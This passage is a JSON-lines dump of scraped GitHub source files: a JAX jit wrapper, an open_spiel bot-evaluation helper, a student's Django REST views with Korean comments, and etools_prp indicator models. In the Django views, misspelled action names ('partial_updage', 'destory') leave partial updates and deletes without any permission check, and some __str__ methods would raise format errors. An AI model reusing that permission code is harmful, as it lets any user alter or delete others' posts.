cached_calls:\n def to_wrap(*args, **kwargs):\n args_with_statics = list(args)\n for i in range(len(args)):\n if i in static_argnums:\n args_with_statics[i] = static_args[i]\n elif i in structure_tree_args_statics:\n args_with_statics[i] = su.merge_trees(args_with_statics[i], structure_tree_args_statics[i])\n elif i in tree_args_statics:\n args_with_statics[i] = merge_jax_nonjax(args_with_statics[i], tree_args_statics[i])\n \n kwargs_with_statics = dict(kwargs)\n for k in kwargs:\n if k in static_argnames:\n kwargs_with_statics[k] = static_kwargs[k]\n elif k in structure_tree_kwargs_statics:\n kwargs_with_statics[k] = su.merge_trees(kwargs_with_statics[k], structure_tree_args_statics[k])\n elif k in tree_kwargs_statics:\n kwargs_with_statics[k] = merge_jax_nonjax(kwargs_with_statics[k], tree_kwargs_statics[k])\n values = fun(*args_with_statics, **kwargs_with_statics)\n\n if not isinstance(values, tuple):\n values = [values]\n \n # this should happen upon first tracing to populate the static parts of any structure trees\n # in the returned values.\n returned_structure_statics = {}\n split_values = list(values)\n for i, v in enumerate(values):\n if i in static_returns:\n jax_tree = None\n nonjax_tree = (v, 'manual_static')\n elif su.is_structure_tree(v):\n jax_tree, nonjax_tree = su.split_non_static(v)\n nonjax_tree = (nonjax_tree, 'structure_tree')\n else:\n jax_tree, nonjax_tree = split_jax_nonjax(v)\n nonjax_tree = (nonjax_tree, 'discovered_static')\n\n if cached_calls[cache_key]['returned_structure_statics'] is None:\n returned_structure_statics[i] = nonjax_tree\n split_values[i] = jax_tree\n if cached_calls[cache_key]['returned_structure_statics'] is None:\n cached_calls[cache_key]['returned_structure_statics'] = returned_structure_statics\n if len(split_values) == 1:\n return split_values[0]\n else:\n return tuple(split_values)\n\n # add this wrapped function to the cache.\n cached_calls[cache_key] = {}\n cached_calls[cache_key]['wrapped_func'] = wrapper(to_wrap, *wrapper_args, **wrapper_kwargs)\n cached_calls[cache_key]['returned_structure_statics'] = None\n\n wrapped = cached_calls[cache_key]['wrapped_func']\n\n args_without_statics = list(split_args)\n kwargs_without_statics = dict(split_kwargs)\n\n\n for i in static_argnums:\n if i < len(args):\n args_without_statics[i] = None\n for k in static_argnames:\n if k in kwargs:\n kwargs_without_statics[k] = None\n \n # add back cached static outputs to the jaxtype outputs.\n values = wrapped(*args_without_statics, **kwargs_without_statics)\n\n if not isinstance(values, tuple):\n values = [values]\n values = list(values)\n \n for i, (v, static_type) in cached_calls[cache_key]['returned_structure_statics'].items():\n if static_type == 'manual_static':\n values[i] = v\n elif static_type == 'structure_tree':\n values[i] = su.merge_trees(values[i], v)\n elif static_type == 'discovered_static':\n values[i] = merge_jax_nonjax(values[i], v)\n else:\n raise ValueError('unknown static type!')\n \n if len(values) == 1:\n return values[0]\n else:\n return tuple(values)\n\n\n return wrapped_fun\n\n return static_wrapper\n\n\njit = improved_static(jax.jit)\n","repo_name":"optimizedlearning/brachy","sub_path":"brachy/structure_util/static_wrapper.py","file_name":"static_wrapper.py","file_ext":"py","file_size_in_byte":13514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72379721707","text":"import pyspiel\n\n\ndef evaluate_bots(state, bots, rng):\n \"\"\"Plays bots against each other, returns terminal utility for each bot.\"\"\"\n for bot in bots:\n bot.restart_at(state)\n while not state.is_terminal():\n if state.is_chance_node():\n outcomes, probs = zip(*state.chance_outcomes())\n action = rng.choice(outcomes, p=probs)\n for bot in bots:\n bot.inform_action(state, pyspiel.PlayerId.CHANCE, action)\n state.apply_action(action)\n elif state.is_simultaneous_node():\n joint_actions = [\n bot.step(state)\n if state.legal_actions(player_id) else pyspiel.INVALID_ACTION\n for player_id, bot in enumerate(bots)\n ]\n state.apply_actions(joint_actions)\n else:\n current_player = state.current_player()\n action = bots[current_player].step(state)\n for i, bot in enumerate(bots):\n if i != current_player:\n bot.inform_action(state, current_player, action)\n state.apply_action(action)\n return state.returns()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/evaluate_bots.py","file_name":"evaluate_bots.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"}
+{"seq_id":"6269037905","text":"from ast import operator\nfrom django.shortcuts import redirect, render\nfrom rest_framework.viewsets import ModelViewSet\nfrom .serializers import CommentHyperlinkedModelSerializer, CommentListModelSerializer, PostListModelSerializer, PostBaseModelSerializer, PostCreateModelSerializer, PostRetrieveModelSerializer\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, action\nfrom rest_framework.views import APIView\nfrom rest_framework import generics, status\nfrom rest_framework.permissions import AllowAny, IsAuthenticated, IsAdminUser\nfrom core.permissions import IsOwnerOnly\n\n\nfrom posts.models import Post, Comment\n\n# Create your views here.\n\n# 게시글 목록 + 게시글 생성 한번에\nclass PostListCreateView(generics.ListAPIView, generics.CreateAPIView): # ListAPIView에 작성된 get 함수와 return하는 list. APIView라고 명명하는게 좋은데 지금은 그냥 이렇게\n # list는 또 queryset, page 등을 담고있음. 이것들을 상속받아서 정의해줘야 함.\n # 즉, queryset과 serializer_class 는 항상 필수래\n # Create는 Post, List는 get형태로 짜여져있어서 하나의 class에 두개 기능 처리 가능. 이렇게 기능이 다 합쳐진게 ViewSet이래\n # 나중에 직접 사용해볼수록 직접 못만들어서 막히는 경우가 생긴대. 다 들어가서 보고 공부하고 그래야 한대\n queryset = Post.objects.all()\n serializer_class = PostListModelSerializer\n\n # 생성자 만들어주기. overriding으로\n # CreateAPIView의 post와 CreateAPIView가 상속받은 CreateModelMixin의 create 재정의\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n # 우리가 바꾼 부분\n # 작성자 받게 customizing\n # self.perform_create(serializer)\n if request.user.is_authenticated:\n instance = serializer.save(writer=request.user)\n else:\n serializer.save()\n\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n# 게시글 상세, 업데이트(수정), 삭제\n# View끼리 상속받는 것들이 포함되어 있는 경우들이 있어서 어떤 기능끼리 묶을지 알아야 하나봐? 걍 다 하나로 묶으면 안되나\n# 웹개발이랑 다르게 RESTFul하게 작성이 되어야 하는데, GET, PUT, PATCH, DELETE는 모두 url에 id값이 들어가있어야 해서 하나로 묶인대. 오호\n# 목록, 게시글생성은 GET/POST이 또 하나로 묶이고\n# API Guide에 있는 표처럼 기능별로 묶어야 하나봐\n# PUT, PATCH 차이. PUT은 자원의 전체를 교체. PATCH는 부분적으로 교체. 차이점은 알고 있어야 한대\n# UpdateView에 put, patch 따로 구분해서 함수 해놨음\nclass PostRetrieveUpdateView(generics.RetrieveAPIView, generics.RetrieveUpdateAPIView, generics.RetrieveDestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostRetrieveModelSerializer\n\n\n \n\nclass PostModelViewSet(ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostListModelSerializer\n\n # def get_serializer_class(self):\n # if self.action == 'create':\n # return PostBaseModelSerializer\n # return super().get_serializer_class()\n\n def get_permissions(self):\n permission_classes = list()\n action = self.action\n if action == 'list':\n permission_classes = [AllowAny]\n elif action in ['create', 'retrieve']:\n permission_classes = [IsAuthenticated]\n elif action in ['update', 'partial_updage', 'destory']:\n permission_classes = [IsOwnerOnly]\n return [permission() for permission in permission_classes]\n\n @action(detail=True, methods=['get'])\n def get_comment_all(self, request, pk=None): # Post의 pk값을 가져와서 comment 가져오는 함수\n post = self.get_object() # 입력받는 값이 없어서 유효성검사 필요 없음. object가 없는 경우는 get_object가 걸러주니까\n comment_all = post.comment_set.all() # comment에서 post의 related_name 안정한 경우 이렇게 부르면 된대\n serializer = CommentListModelSerializer(comment_all, many=True)\n return Response(serializer.data)\n\n\n\nclass CommentModelViewSet(ModelViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentHyperlinkedModelSerializer\n\n@api_view()\ndef calculator(request):\n # 1. 데이터 확인\n num1 = request.GET.get('num1', 0)\n num2 = request.GET.get('num2', 0)\n operators = request.GET.get('operators')\n\n # 2. 계산\n if operators == '+':\n result = int(num1) + int(num2)\n elif operators == '-':\n result = int(num1) - int(num2)\n elif operators == '*':\n result = int(num1) * int(num2)\n elif operators == '/':\n result = int(num1) / int(num2)\n else:\n result = 0\n\n # 3. 응답\n data = {\n 'type' : 'FBV', # 함수기반 view라고 명시해줄라고 FBV\n 'result' : result,\n\n }\n return Response(data) # DRF에서 제공해주는 API. Dictionary 형태로 넣어주면 됨\n\n\n# APIView 상속받아서 class 기반 Calculator 기능 만들어보기\nclass CalculatorAPIView(APIView):\n def get(self, request): # 클래스 기반으로 만들때(CBV)는 get 요청을 어떻게 처리할지 이해가 있어야 함. get 함수 만들면 됨\n # get요청을 받으면 이렇게 알아서 get함수 타게 해놨나봐\n # class에 있는 함수는 무조건 self 가져야 된대\n # 1. 데이터 확인\n num1 = request.GET.get('num1', 0)\n num2 = request.GET.get('num2', 0)\n operators = request.GET.get('operators')\n\n # 2. 계산\n if operators == '+':\n result = int(num1) + int(num2)\n elif operators == '-':\n result = int(num1) - int(num2)\n elif operators == '*':\n result = int(num1) * int(num2)\n elif operators == '/':\n result = int(num1) / int(num2)\n else:\n print('error')\n result = 0\n\n # 3. 응답\n data = {\n 'type' : 'CBV', # 클래스 기반 view라고 명시해줄라고 CBV\n 'result' : result,\n\n }\n return Response(data)\n \n def post(self, request):\n data = {\n 'type' : 'CBV',\n 'method' : 'POST',\n 'result' : 0,\n\n }\n return Response(data)\n\n# frontapp 열려고 해봄. 그냥 html 파일 열고 들어가면 No 'Access-Control-Allow-Origin' header is present on the requested resource. error 생겨서\n# 근데 이렇게 들어가도 결국 local 주소 타고 들어가서 data 불러오는 거라 안되네;; 어케하는거지\n# 1. 설치 chrome plugin에서 Allow CORS: Access-Control-Allow-Origin'\n# 2. 서버쪽 세팅\n# res.setHeader('Access-Control-Allow-origin', '*');\n# res.setHeader('Access-Control-Allow-Credentials', 'true'); // 쿠키 주고받기 허용\n# res.setHeader('Access-Control-Allow-origin', 'https://inpa.tistory.com');\n# 출처: https://inpa.tistory.com/entry/WEB-📚-CORS-💯-정리-해결-방법-👏 [👨💻 Dev Scroll]\ndef post_frontapp(request):\n return render(request, 'frontapp.html')","repo_name":"Django-Mission/django_mission_01-Choi-Korean","sub_path":"liongram-api/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7517,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"34683429734","text":"from functools import reduce\n\nfrom django.conf import settings\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.postgres.fields import ArrayField\nfrom django.db import models, transaction\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.functional import cached_property\n\nfrom model_utils.models import TimeStampedModel\nfrom model_utils.tracker import FieldTracker\nfrom requests.compat import urljoin\nfrom rest_framework import serializers\n\nfrom etools_prp.apps.core.common import (\n FINAL_OVERALL_STATUS,\n FREQUENCY_LEVEL,\n INDICATOR_REPORT_STATUS,\n OVERALL_STATUS,\n PROGRESS_REPORT_STATUS,\n PRP_ROLE_TYPES,\n REPORTABLE_FREQUENCY_LEVEL,\n REPORTING_TYPES,\n)\nfrom etools_prp.apps.core.models import TimeStampedExternalSourceModel\nfrom etools_prp.apps.core.validators import JSONSchemaValidator\nfrom etools_prp.apps.indicator.constants import ValueType\nfrom etools_prp.apps.indicator.disaggregators import QuantityIndicatorDisaggregator, RatioIndicatorDisaggregator\nfrom etools_prp.apps.indicator.json_schemas import disaggregation_schema, indicator_schema\nfrom etools_prp.apps.indicator.utilities import convert_string_number_to_float\nfrom etools_prp.apps.partner.models import PartnerActivity\nfrom etools_prp.apps.utils.emails import send_email_from_template\n\n\ndef default_total():\n return dict([('c', 0), ('d', 1), ('v', 0)])\n\n\ndef default_value():\n return dict([('d', 1), ('v', 0)])\n\n\nclass Disaggregation(TimeStampedExternalSourceModel):\n \"\"\"\n Disaggregation module. For example: \n\n related models:\n core.ResponsePlan (ForeignKey): \"response_plan\"\n \"\"\"\n name = models.CharField(max_length=255, verbose_name=\"Disaggregation by\")\n # IP reporting ones won't have this fk.\n response_plan = models.ForeignKey(\n 'core.ResponsePlan',\n related_name=\"disaggregations\",\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n )\n active = models.BooleanField(default=True)\n\n class Meta:\n unique_together = ('name', 'response_plan')\n\n def __str__(self):\n return \"Disaggregation %s\" % (self.id, self.name)\n\n\nclass DisaggregationValue(TimeStampedExternalSourceModel):\n \"\"\"\n Disaggregation Value module. For example: Gender \n\n related models:\n indicator.Disaggregation (ForeignKey): \"disaggregation\"\n \"\"\"\n disaggregation = models.ForeignKey(\n Disaggregation,\n related_name=\"disaggregation_values\",\n on_delete=models.CASCADE,\n )\n value = models.CharField(max_length=128)\n\n # TODO: we won't allow these to be edited out anymore, so 'active' might\n # not as relevant anymore.\n # See https://github.com/unicef/etools-partner-reporting-portal/issues/244\n active = models.BooleanField(default=True)\n\n class Meta:\n unique_together = ('disaggregation', 'value')\n\n def __str__(self):\n return \"Disaggregation Value %s\" % (self.id, self.value)\n\n\nclass IndicatorBlueprint(TimeStampedExternalSourceModel):\n \"\"\"\n IndicatorBlueprint module is a pattern for indicator\n (here we setup basic parameter).\n \"\"\"\n NUMBER = 'number'\n PERCENTAGE = 'percentage'\n UNIT_CHOICES = (\n (NUMBER, NUMBER),\n (PERCENTAGE, PERCENTAGE),\n )\n\n SUM = 'sum'\n MAX = 'max'\n AVG = 'avg'\n LATEST = 'latest'\n RATIO = 'ratio'\n\n QUANTITY_CALC_CHOICE_LIST = (\n SUM,\n MAX,\n AVG,\n )\n\n RATIO_CALC_CHOICE_LIST = (\n SUM,\n )\n\n QUANTITY_CALC_CHOICES = (\n (SUM, SUM),\n (MAX, MAX),\n (AVG, AVG),\n )\n\n RATIO_CALC_CHOICES = (\n (SUM, SUM),\n )\n\n CALC_CHOICES = (\n (SUM, SUM),\n (MAX, MAX),\n (AVG, AVG),\n (LATEST, LATEST),\n )\n\n QUANTITY_DISPLAY_TYPE_CHOICES = (\n (NUMBER, NUMBER),\n )\n\n RATIO_DISPLAY_TYPE_CHOICES = (\n (PERCENTAGE, PERCENTAGE),\n (RATIO, RATIO)\n )\n\n DISPLAY_TYPE_CHOICES = QUANTITY_DISPLAY_TYPE_CHOICES + \\\n RATIO_DISPLAY_TYPE_CHOICES\n\n title = models.TextField(max_length=2048, db_index=True)\n unit = models.CharField(max_length=10, choices=UNIT_CHOICES,\n default=NUMBER)\n description = models.CharField(max_length=3072, null=True, blank=True)\n code = models.CharField(max_length=50, null=True, blank=True, unique=True)\n subdomain = models.CharField(max_length=255, null=True, blank=True)\n disaggregatable = models.BooleanField(default=False)\n\n calculation_formula_across_periods = models.CharField(\n max_length=10, choices=CALC_CHOICES, default=SUM\n )\n calculation_formula_across_locations = models.CharField(\n max_length=10, choices=CALC_CHOICES, default=SUM\n )\n\n display_type = models.CharField(\n max_length=10, choices=DISPLAY_TYPE_CHOICES, default=NUMBER\n )\n\n # TODO: add:\n # siblings (similar indicators to this indicator)\n # other_representation (exact copies with different names for some random reason)\n # children (indicators that aggregate up to this or contribute to this indicator through a formula)\n # aggregation_types (potential aggregation types: geographic, time-periods ?)\n # aggregation_formulas (how the total value is aggregated from the reports\n # if possible)\n\n def save(self, *args, **kwargs):\n # Prevent from saving empty strings as code because of the unique\n # together constraint\n if self.code == '':\n self.code = None\n super().save(*args, **kwargs)\n\n def clean(self):\n \"\"\"\n To check that the calculation method and display type being assigned\n are appropriate based on type of unit.\n \"\"\"\n unit_to_valid_calc_values = {\n self.NUMBER: list(map(lambda x: x[0], self.QUANTITY_CALC_CHOICES)),\n self.PERCENTAGE: list(map(lambda x: x[0], self.RATIO_CALC_CHOICES)),\n }\n if self.calculation_formula_across_periods not in unit_to_valid_calc_values.get(self.unit, []) or \\\n self.calculation_formula_across_locations not in unit_to_valid_calc_values.get(self.unit, []):\n raise serializers.ValidationError('Calculation methods not supported by selected unit')\n\n unit_to_valid_display_type_values = {\n self.NUMBER: map(lambda x: x[0], self.QUANTITY_DISPLAY_TYPE_CHOICES),\n self.PERCENTAGE: map(lambda x: x[0], self.RATIO_DISPLAY_TYPE_CHOICES),\n }\n if self.display_type not in unit_to_valid_display_type_values.get(self.unit, [\n ]):\n raise serializers.ValidationError('Display type is not supported by selected unit')\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = ['-id']\n unique_together = TimeStampedExternalSourceModel.Meta.unique_together\n\n\n@receiver(post_save,\n sender=IndicatorBlueprint,\n dispatch_uid=\"trigger_indicator_report_recalculation\")\ndef trigger_indicator_report_recalculation(sender, instance, **kwargs):\n \"\"\"\n Whenever an indicator blueprint is saved, IndicatorReport objects\n linked to this IndicatorBlueprint via its Reportable should all be\n recalculated for its total.\n \"\"\"\n irs = IndicatorReport.objects.filter(reportable__in=instance.reportables.all())\n\n if instance.unit == IndicatorBlueprint.NUMBER:\n for ir in irs:\n QuantityIndicatorDisaggregator.calculate_indicator_report_total(ir)\n\n elif instance.unit == IndicatorBlueprint.PERCENTAGE:\n for ir in irs:\n RatioIndicatorDisaggregator.calculate_indicator_report_total(ir)\n\n\nclass Reportable(TimeStampedExternalSourceModel):\n \"\"\"\n Reportable / Applied Indicator model.\n\n related models:\n ContentType (ForeignKey): \"content_type\"\n content_type & object_id fields (GenericForeignKey): \"content_object\"\n partner.PartnerProject (ForeignKey): \"project\"\n indicator.IndicatorBlueprint (ForeignKey): \"blueprint\"\n cluster.ClusterObjective (ForeignKey): \"content_object\"\n self (ForeignKey): \"parent_indicator\"\n \"\"\"\n target = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n baseline = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n in_need = models.JSONField(\n blank=True, null=True,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n assumptions = models.TextField(null=True, blank=True)\n means_of_verification = models.CharField(max_length=255, null=True, blank=True)\n comments = models.TextField(max_length=4048, blank=True, null=True)\n measurement_specifications = models.TextField(max_length=4048, blank=True, null=True)\n label = models.TextField(max_length=4048, blank=True, null=True)\n numerator_label = models.CharField(max_length=256, blank=True, null=True)\n denominator_label = models.CharField(max_length=256, blank=True, null=True)\n start_date_of_reporting_period = models.DateField(blank=True, null=True)\n\n is_cluster_indicator = models.BooleanField(default=False)\n is_unicef_hf_indicator = models.BooleanField(default=False)\n\n contributes_to_partner = models.BooleanField(default=False)\n\n # Current total, transactional and dynamically calculated based on\n # IndicatorReports\n total = models.JSONField(default=default_total, validators=[JSONSchemaValidator(json_schema=indicator_schema)])\n\n # unique code for this indicator within the current context\n # eg: (1.1) result code 1 - indicator code 1\n context_code = models.CharField(\n max_length=50, null=True, blank=True, verbose_name=\"Code in current context\"\n )\n\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n # One of ClusterObjective, ClusterActivity, PartnerProject, PartnerActivity\n content_object = GenericForeignKey('content_type', 'object_id')\n blueprint = models.ForeignKey(\n IndicatorBlueprint,\n related_name=\"reportables\",\n on_delete=models.CASCADE,\n null=True,\n )\n parent_indicator = models.ForeignKey(\n 'self',\n related_name='children',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n db_index=True,\n )\n locations = models.ManyToManyField(\n 'core.Location',\n related_name=\"reportables\",\n through=\"ReportableLocationGoal\"\n )\n\n frequency = models.CharField(\n max_length=3,\n choices=REPORTABLE_FREQUENCY_LEVEL,\n default=REPORTABLE_FREQUENCY_LEVEL.monthly,\n verbose_name='Frequency of reporting'\n )\n\n cs_dates = ArrayField(\n models.DateField(), default=list, null=True, blank=True\n )\n location_admin_refs = ArrayField(\n models.JSONField(), default=list, null=True, blank=True\n )\n disaggregations = models.ManyToManyField(Disaggregation, blank=True)\n\n active = models.BooleanField(default=True)\n\n ca_indicator_used_by_reporting_entity = models.ForeignKey(\n 'self',\n related_name='ca_indicators_re',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n db_index=True\n )\n\n class Meta:\n ordering = ['-id']\n\n @property\n def ref_num(self):\n \"\"\"reference_number of the PD\"\"\"\n from etools_prp.apps.unicef.models import LowerLevelOutput\n\n if isinstance(self.content_object, LowerLevelOutput):\n return self.content_object.cp_output.programme_document.reference_number\n else:\n return ''\n\n @property\n def pd_id(self):\n \"\"\"reference_number of the PD\"\"\"\n from etools_prp.apps.unicef.models import LowerLevelOutput\n\n if isinstance(self.content_object, LowerLevelOutput):\n return self.content_object.cp_output.programme_document.id\n else:\n return ''\n\n @property\n def achieved(self):\n return self.total\n\n @property\n def calculated_target(self):\n if not self.target['v']:\n return 0.0\n\n if self.blueprint.unit == IndicatorBlueprint.NUMBER:\n return convert_string_number_to_float(self.target['v'])\n else:\n return convert_string_number_to_float(self.target['v']) / convert_string_number_to_float(self.target['d'])\n\n @property\n def calculated_baseline(self):\n if not self.baseline['v']:\n return 0.0\n\n if self.blueprint.unit == IndicatorBlueprint.NUMBER:\n return convert_string_number_to_float(self.baseline['v'])\n else:\n return convert_string_number_to_float(self.baseline['v']) / convert_string_number_to_float(self.baseline['d'])\n\n @property\n def calculated_in_need(self):\n if not self.in_need or self.in_need['v'] == \"\":\n return None\n\n if self.blueprint.unit == IndicatorBlueprint.NUMBER:\n return convert_string_number_to_float(self.in_need['v'])\n else:\n return convert_string_number_to_float(self.in_need['v']) / convert_string_number_to_float(self.in_need['d'])\n\n @property\n def progress_percentage(self):\n percentage = 0.0\n\n if self.achieved and self.baseline['v'] is not None and self.target['v'] is not None:\n baseline = convert_string_number_to_float(self.calculated_baseline)\n target = convert_string_number_to_float(self.calculated_target)\n\n dividend = 0 # default progress is 0\n if self.achieved['c'] > baseline:\n dividend = self.achieved['c'] - baseline\n divisor = convert_string_number_to_float(target) - baseline\n if divisor:\n percentage = round(dividend / divisor, 2)\n return percentage\n\n @classmethod\n def get_narrative_and_assessment(cls, progress_report_id):\n progress_report = IndicatorReport.objects.filter(\n progress_report_id=progress_report_id).first()\n return {\n 'overall_status': progress_report and progress_report.overall_status,\n 'narrative_assessment': progress_report and progress_report.narrative_assessment,\n }\n\n def __str__(self):\n return \"Reportable #{} {} on {}\".format(\n self.id, self.blueprint and self.blueprint.title, self.content_object\n )\n\n\ndef get_reportable_data_to_clone(instance):\n \"\"\"\n get_reportable_data_to_clone returns a map of field name and its value\n to clone a new Reportable instance\n\n Arguments:\n instance {indicator.models.Reportable} -- Reportable model instance\n \"\"\"\n return {\n 'active': instance.active,\n 'assumptions': instance.assumptions,\n 'baseline': instance.baseline,\n 'context_code': instance.context_code,\n 'created': instance.created,\n 'cs_dates': instance.cs_dates,\n 'external_id': instance.external_id,\n 'frequency': instance.frequency,\n 'in_need': instance.in_need,\n 'is_cluster_indicator': instance.is_cluster_indicator,\n 'location_admin_refs': instance.location_admin_refs,\n 'means_of_verification': instance.means_of_verification,\n 'modified': instance.modified,\n 'target': instance.target,\n 'comments': instance.comments,\n 'measurement_specifications': instance.measurement_specifications,\n 'start_date_of_reporting_period': instance.start_date_of_reporting_period,\n 'label': instance.label,\n 'numerator_label': instance.numerator_label,\n 'denominator_label': instance.denominator_label,\n }\n\n\ndef create_reportable_for_pa_from_ca_reportable(pa, ca_reportable):\n \"\"\"\n Copies one CA reportable instance to a partner activity.\n\n Arguments:\n pa {partner.models.PartnerActivity} -- PartnerActivity to copy to\n reportable {indicator.models.Reportable} -- ClusterActivity Reportable\n\n Raises:\n ValidationError -- Django Exception\n \"\"\"\n\n if ca_reportable.content_object != pa.cluster_activity:\n raise serializers.ValidationError(\"The Parent-child relationship is not valid\")\n\n reportable_data_to_sync = get_reportable_data_to_clone(ca_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"blueprint\"] = ca_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = ca_reportable\n\n for project_context in pa.partneractivityprojectcontext_set.all():\n reportable_data_to_sync[\"content_object\"] = project_context\n pa_reportable = Reportable.objects.create(**reportable_data_to_sync)\n pa_reportable.disaggregations.add(*ca_reportable.disaggregations.all())\n\n\ndef create_reportable_for_papc_from_ca_reportable(papc, ca_reportable):\n \"\"\"\n Copies one CA reportable instance to a partner activity project context.\n\n Arguments:\n papc {partner.models.PartnerActivityProjectContext} -- PartnerActivityProjectContext to copy to\n reportable {indicator.models.Reportable} -- ClusterActivity Reportable\n\n Raises:\n ValidationError -- Django Exception\n \"\"\"\n\n if ca_reportable.content_object != papc.activity.cluster_activity:\n raise serializers.ValidationError(\"The Parent-child relationship is not valid\")\n\n reportable_data_to_sync = get_reportable_data_to_clone(ca_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"blueprint\"] = ca_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = ca_reportable\n\n reportable_data_to_sync[\"content_object\"] = papc\n pa_reportable = Reportable.objects.create(**reportable_data_to_sync)\n pa_reportable.disaggregations.add(*ca_reportable.disaggregations.all())\n\n\ndef create_reportable_for_pp_from_ca_reportable(pp, ca_reportable):\n \"\"\"\n Copies one CA reportable instance to a partner activity.\n\n Arguments:\n pp {partner.models.PartnerProject} -- PartnerProject to copy to\n reportable {indicator.models.Reportable} -- ClusterActivity Reportable\n\n Raises:\n ValidationError -- Django Exception\n \"\"\"\n\n reportable_data_to_sync = get_reportable_data_to_clone(ca_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"content_object\"] = pp\n reportable_data_to_sync[\"blueprint\"] = ca_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = ca_reportable\n pp_reportable = Reportable.objects.create(**reportable_data_to_sync)\n\n pp_reportable.disaggregations.add(*ca_reportable.disaggregations.all())\n\n return pp_reportable\n\n\ndef create_reportable_for_pp_from_co_reportable(pp, co_reportable):\n \"\"\"\n Copies one CO reportable instance to a partner project.\n\n Arguments:\n pp {partner.models.PartnerProject} -- PartnerProject to copy to\n co_reportable {indicator.models.Reportable} -- ClusterObjective Reportable\n\n Raises:\n ValidationError -- Django Exception\n\n Returns:\n Reportable -- PartnerProject type Reportable ORM instance\n \"\"\"\n\n # TODO: Add Cluster objective to have only one PartnerProject for a Partner\n reportable_data_to_sync = get_reportable_data_to_clone(co_reportable)\n reportable_data_to_sync['total'] = dict([('c', 0), ('d', 1), ('v', 0)])\n reportable_data_to_sync[\"content_object\"] = pp\n reportable_data_to_sync[\"blueprint\"] = co_reportable.blueprint\n reportable_data_to_sync[\"parent_indicator\"] = None\n pp_reportable = Reportable.objects.create(**reportable_data_to_sync)\n\n pp_reportable.disaggregations.add(*co_reportable.disaggregations.all())\n\n return pp_reportable\n\n\ndef create_pa_reportables_from_ca(pa, ca):\n \"\"\"\n Creates a set of PartnerActivity Reportable instances from\n ClusterActivity instance to target PartnerActivity instance\n\n Arguments:\n pa {partner.models.PartnerActivity} -- Target PartnerActivity instance\n ca {cluster.models.ClusterActivity} -- ClusterActivity to copy from\n \"\"\"\n\n if Reportable.objects.filter(partner_activity_project_contexts__activity=pa).count() > 0:\n return\n\n for reportable in ca.reportables.all():\n create_reportable_for_pa_from_ca_reportable(pa, reportable)\n\n\ndef create_papc_reportables_from_ca(papc, ca):\n \"\"\"\n Creates a set of PartnerActivityProjectContext Reportable instances from\n ClusterActivity instance to target PartnerActivityProjectContext instance\n\n Arguments:\n papc {partner.models.PartnerActivityProjectContext} -- Target PartnerActivityProjectContext instance\n ca {cluster.models.ClusterActivity} -- ClusterActivity to copy from\n \"\"\"\n\n if Reportable.objects.filter(partner_activity_project_contexts=papc).count() > 0:\n return\n\n for reportable in ca.reportables.all():\n create_reportable_for_papc_from_ca_reportable(papc, reportable)\n\n\ndef create_pa_reportables_for_new_ca_reportable(instance):\n \"\"\"\n Useful when creating a new CA reportable to create\n a set of PartnerActivity Reportable instances.\n\n Arguments:\n instance {indicator.models.Reportable} -- Cluster Activity Reportable to copy from\n \"\"\"\n for pa in instance.content_object.partner_activities.all():\n create_reportable_for_pa_from_ca_reportable(pa, instance)\n\n\ndef sync_ca_reportable_update_to_pa_reportables(instance, created):\n \"\"\"\n Whenever a Cluster Activity Reportable is created or is updated,\n clone_ca_reportable_to_pa handles a Reportable instance data to\n its Cluster Activity's Partner Activity instances.\n\n Under create flag, Partner Activity will get a new Reportable instance\n from Cluster Activity Reportable instance.\n\n Otherwise, update each cloned Reportable instance\n from its Cluster Activity's Partner Activity instances.\n\n Arguments:\n instance {indicator.models.Reportable} -- Reportable model instance\n created {boolean} -- created flag from Django post_save signal\n \"\"\"\n\n if instance.content_type.model == \"clusteractivity\":\n reportable_data_to_sync = get_reportable_data_to_clone(instance)\n\n if not created:\n # Update PA Reportable instances first\n instance.children.update(**reportable_data_to_sync)\n\n # Grab LLO Reportable instances that have CAI ID reference\n llo_reportables = Reportable.objects.filter(\n ca_indicator_used_by_reporting_entity=instance,\n lower_level_outputs__isnull=False\n )\n\n # Update these LLO Reportable instances except parent_indicator info\n if llo_reportables.exists():\n reportable_data_to_sync['blueprint'] = instance.blueprint\n llo_reportables.update(**reportable_data_to_sync)\n\n\n@receiver(post_save,\n sender=Reportable,\n dispatch_uid=\"clone_ca_reportable_to_pa\")\ndef clone_ca_reportable_to_pa_signal(sender, instance, created, **kwargs):\n 